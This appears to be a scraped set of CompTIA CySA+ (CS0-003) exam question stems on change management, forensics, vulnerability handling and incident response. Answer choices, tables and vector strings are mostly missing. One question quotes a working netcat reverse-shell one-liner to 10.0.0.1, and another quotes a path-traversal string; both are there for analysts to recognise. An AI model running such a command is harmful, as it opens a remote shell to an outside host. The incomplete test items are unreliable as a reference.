COMPTIA-CYSA

CompTIA's CS0-003 An organization has establish a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Choose two.) E. Require diagrams to be completed for all critical systems. F. Ensure that all assets are properly listed in the inventory management system.

CompTIA's CS0-003 An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason in the firewall feed stopped working?

CompTIA's CS0-003 A security analyst would like to integrate two different SaaS-based security toots so that one tool can notify the other in the event a threat is detected. Which of the following should the analyst utilize to best accomplish this goal?

CompTIA's CS0-003 An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of the evidence drive does not match the resultant hash of the imaged copy. Which of the following best describes the reason for the conflicting investigative findings?

CompTIA's CS0-003 A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?

CompTIA's CS0-003 A security analyst detected the following suspicious activity:rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/fWhich of the following most likely describes the activity?

CompTIA's CS0-003 An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender.Which of the following information security goals is the analyst most likely trying to achieve?

CompTIA's CS0-003 Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes what the team is doing?

CompTIA's CS0-003 Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (Choose two.) E. Write blocker F. Drive duplicator

CompTIA's CS0-003 During the rollout of a patch to the production environment, it was discovered that required connections to remote systems are no longer possible. Which of the following steps would have most likely revealed this gap?

CompTIA's CS0-003 An organization has tracked several incidents that are listed in the following table:Which of the following is the organization’s MTTD?

CompTIA's CS0-003 A security analyst has found a moderate-risk item in an organization’s point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?

CompTIA's CS0-003 While reviewing the web server logs, a security analyst notices the following snippet:..\../..\../boot.iniWhich of the following is being attempted? E. Enumeration of /etc/passwd

CompTIA's CS0-003 Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the following CVSS v.3.1 temporal metrics was most impacted by this exposure?

CompTIA's CS0-003 Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?

CompTIA's CS0-003 Which of the following best describes the importance of KPIs in an incident response exercise?

CompTIA's CS0-003 An organization is conducting a pilot deployment of an e-commerce application. The application’s source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?

CompTIA's CS0-003 A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incident without impacting operations?

CompTIA's CS0-003 A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent?

CompTIA's CS0-003 A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings:Which of the following vulnerabilities should be patched first?

CompTIA's CS0-003 Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?

CompTIA's CS0-003 An organization plans to use an advanced machine-learning tool as a central collection server. The tool will perform data aggregation and analysis. Which of the following should the organization implement?

CompTIA's CS0-003 A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?

CompTIA's CS0-003 A corporation wants to implement an agent-based endpoint solution to help:• Flag various threats• Review vulnerability feeds• Aggregate data• Provide real-time metrics by using scripting languagesWhich of the following tools should the corporation implement to reach this goal?

CompTIA's CS0-003 A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process?

CompTIA's CS0-003 Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes does this describe?

CompTIA's CS0-003 Which of the following most accurately describes the Cyber Kill Chain methodology?

CompTIA's CS0-003 After a recent vulnerability report for a server is presented, a business must decide whether to secure the company’s web-based storefront or shut it down. The developer is not able to fix the zero-day vulnerability because a patch does not exist yet. Which of the following is the best option for the business?

CompTIA's CS0-003 During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most likely cause of this issue?

CompTIA's CS0-003 Which of the following is the best reason to implement an MOU?